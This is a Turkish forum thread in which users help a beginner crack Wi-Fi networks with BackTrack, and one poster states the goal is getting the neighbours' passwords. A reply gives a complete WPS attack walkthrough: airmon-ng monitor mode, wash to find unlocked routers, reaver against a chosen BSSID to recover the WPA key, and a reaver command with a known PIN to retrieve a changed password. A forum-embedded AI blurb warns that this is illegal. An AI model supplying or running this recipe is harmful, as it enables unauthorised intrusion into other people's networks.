Şimdi Ara

BackTrack'dan Anlayan Biri Lütfen Yardım Etsin...

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir (1 Mobil) - 1 Masaüstü1 Mobil
5 sn
22
Cevap
2
Favori
830
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 12
Sayfaya Git
Git
sonraki
Giriş
  • Merhaba arkadaşlar ben BackTrack programını kullanıyorum ve youtube'da wifi kırmak için bütün adamları izledim ama 1 türlü 1 aşamayı geçemedim yardımcı olursanız duacınız olurum gerçi benim gibi 1 adamın duası ne kadar kabul olursa neyse.İşte Arkadaşlar artık son adımlardan olan (Wash -i mon0) komutunu yazıyorum ama resimdeki hatayı alıyorum.

• Yapay Zekanın Yanıtı

BackTrack ile Wi-Fi Kırma

BackTrack, kablosuz ağları güvenlik açıkları açısından test etmek ve kırmak için tasarlanmış Linux tabanlı bir işletim sistemidir. İzinsiz kişilerin Wi-Fi ağlarına erişmesine izin verdiği için etik olmayan bir araç olarak kabul edilir.

BackTrack, çeşitli kablosuz saldırı tekniklerini gerçekleştirmek için kullanılabilir, bunlar arasında şunlar yer alır:

• WEP ve WPA/WPA2 şifreleme protokollerini kırma
    • Kablosuz erişim noktalarına kimlik avı saldırıları düzenleme
    • Veri paketlerini yakalama ve analiz etme

BackTrack ile Wi-Fi ağlarını kırmak, yüksek düzeyde teknik bilgi ve uzmanlık gerektirir. Bu işlem aynı zamanda yasa dışı olabilir ve ciddi yasal sonuçlar doğurabilir. Bu nedenle, bu tekniğin yalnızca eğitim veya araştırma amaçlı kullanılması tavsiye edilir.

Not: Wi-Fi ağları yasal olarak korunmaktadır ve izinsiz erişim ciddi suç teşkil eder. Hiçbir zaman başkalarının Wi-Fi ağlarına izinsiz erişmeye çalışmamalısın.

Yapay Zekanın Yanıtını Genişlet
  • HAFTALIK HEÇKIR KONUSU

• Ben forumlara pek giren birisi değilim demek istedini tam olarak anlıyamadım
  • quote:

Orijinalden alıntı: conserve05

Ben forumlara pek giren birisi değilim demek istedini tam olarak anlıyamadım

Pardon bi an konu dışındayım zannettim bu işler zordur
  • Ahmed benimi hacklicen
  • benim sadece amacım komşuların wifi şifresini öğrenmek
  • Takip
  • quote:

benim sadece amacım komşuların wifi şifresini öğrenmek

Bu işler zor. Wordlistleri felan araştır :)
  • 1- "airmon-ng"

2- "airmon-ng start wlan0" (wlan0 benim interface sizinkinde ne yazıyorsa onu yazın genelde wlan0 olur eğer resimdeki gibi wireless chipset görünmüyorsa backtrack tarafından desteklenmiyor demektir hemen bir bardak soğuk su içebilir ve windows a geri dönebilirsiniz veya bir wireless adaptör satın alabilirsiniz.)

3-"monitor mode enabled on mon0" yazısını gördüğünüzde her şey yolunda demektir.

4- "wash -i mon0 --ignore fcs" yazıyoruz ve etraftaki wps özelliği açık olan modemleri arıyoruz. bulduğumuzda oradaki "wps locked yazısının altında "no" olduğuna emin olmamız lazım. Yes ise onu kıramazsınız demektir. ctrl + z ye basarak aramayı bitiriyor ve ardından o ağın "bssid" adresini bir yere kopyalıyoruz.

5- Sıra kırmaya geldi. Şu komutları yazıyoruz.

"reaver -i mon0 -b [kopyaladığın bssid adresi] -vv"

6- İşlem Başlamış Durumda

Bundan sonra bilgisayarı kendi haline bırakın. Hiç oynamayın oynatmayın bilgisayar modeme ne kadar yakın olursa o kadar çabuk şifreyi kırar. Şifreyi kırmak yaklaşık 10, en fazla 24 saat sürüyor. Kırdığında da ekranda şöyle bir yazı yer alacak.

[+] pin cracked in 13473 seconds
    [+] wps pin: ’pin numarası′
    [+] wpa psk: ‘wireless şifresi’
    [+] ap ssid: ‘modemin adı’

Buradaki "wpa psk:" wirelessin kırdığımız şifresi oluyor. Windowsa dönüp o ağa bağlanabilirsiniz.

Not : Eğer Karsı Taraf Şifreyi Değiştirse Bile Sorun Yok Çözüm Burada
    reaver -i mon0 -c 11 -b [MAC adres] -p[WPS PIN]-vv
    kodu ile 1 saniye yeni şifreyi verir size

• Öncelikle yardim etmeye calisip yorum attiniz icin cok tesekúrler simdi sõyle kardsm benim adabtõr program icin uyumlu cunkü gittim média mark dan 60 tl Ye aldm ve altada gõrûnûyor ama monütör moduma aliyorum ve son asamalardan olan wash -i .... Iste orda bu hatayi aliyorum bu sorunu nette arastirdm reaver 1.4 ü reaver 1.3 cevirin yaziyor ama nasil yapcami Bilmiyorumki yyardimci olursanız cok sevinirim...bu arada türkcem cok iyi olmaya bilir k.b
  • quote:

Orijinalden alıntı: Maestro58

quote:

benim sadece amacım komşuların wifi şifresini öğrenmek

Bu işler zor. Wordlistleri felan araştır :)

Alıntıları Göster
    Madem az çok birşey biliyoruz yardım edelim...

Şimdi bunu part halinde video çekmek daha mantıklı olabilir.
  • quote:

Orijinalden alıntı: bersan1

Madem az çok birşey biliyoruz yardım edelim...

Şimdi bunu part halinde video çekmek daha mantıklı olabilir.

Alıntıları Göster
    ayrıca dikkatimi çekti

wifi alıcısı bağlı gözükmüyor
  • Kardsm butün ayarlarimin tam oldunu saniyordm.acaba nasil aktif edebilirim bide video şeklinde anlatirsan eğer Snn de YouTube özgûn kanal varsa reklamini yaparım
    Boylece benimde sana yrdmm dokunmus olur.
  • Wifi alicisi derken monitõr moduna alana kadar sorun yaşamadim adaptör de var.
  • Saglam wordlist olmadan boşa kürek çekmek gibi bişey...düzgün şeyler öğrenmek için uğraşın arkadaşım. Türklerin yaptığı geniş kapsamlı wordlist var mıdır bilemiyorum en son 2GB lik bi wordlist vardi yabanci kelimelerden oluşan. Sen iyisi mi Backtrack Kali Linux falan bilmedigin seylerle uğraşma Jumpstart yükle windows ortaminda uğraş hevesini almış olursun.
  • Kardesm bu benim icin cok õnemli ne yapmam gerektini anlatin Veya su siteye gir sunlari Yap diyin çünkü ben internetten para kaziniyorm ve interneté duzgün giremedimden az olan gelirim düstû.insan istedikten sonra yapamica bisi yoktur hem
  • Arkadaslar yardimiNızı bekliyorum..
  • quote:

Arkadaslar yardimiNızı bekliyorum..
    kardeş backtraqckın hangi sürümünü kullanıyorsun 5R3 ise wifi konusunda oldukça yardımcı olabiilirim
  • Öncelikle yardim etmeye çaliştin için cok tesekürler.
    Kardesm Aynn dedin sûrümü kullaniyorm herseyi var gittim média markt dan 69 tl Ye adaptõr aldm ve YouTube den yapmm gereken adimlari yptm ancak resimdeki yerde takildim.Internette çözüm olarak reaver 1.4 ü 1.3 çevirmem söyleniyor ama o kodlari yazdimda yine hata aliyorum acaba internet filan mi olmasi gerekio reaver 1.3 e çevirmem için yardimci olursan duacın olurum...
  • Konu güncel....
  • 
Sayfa: 12
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.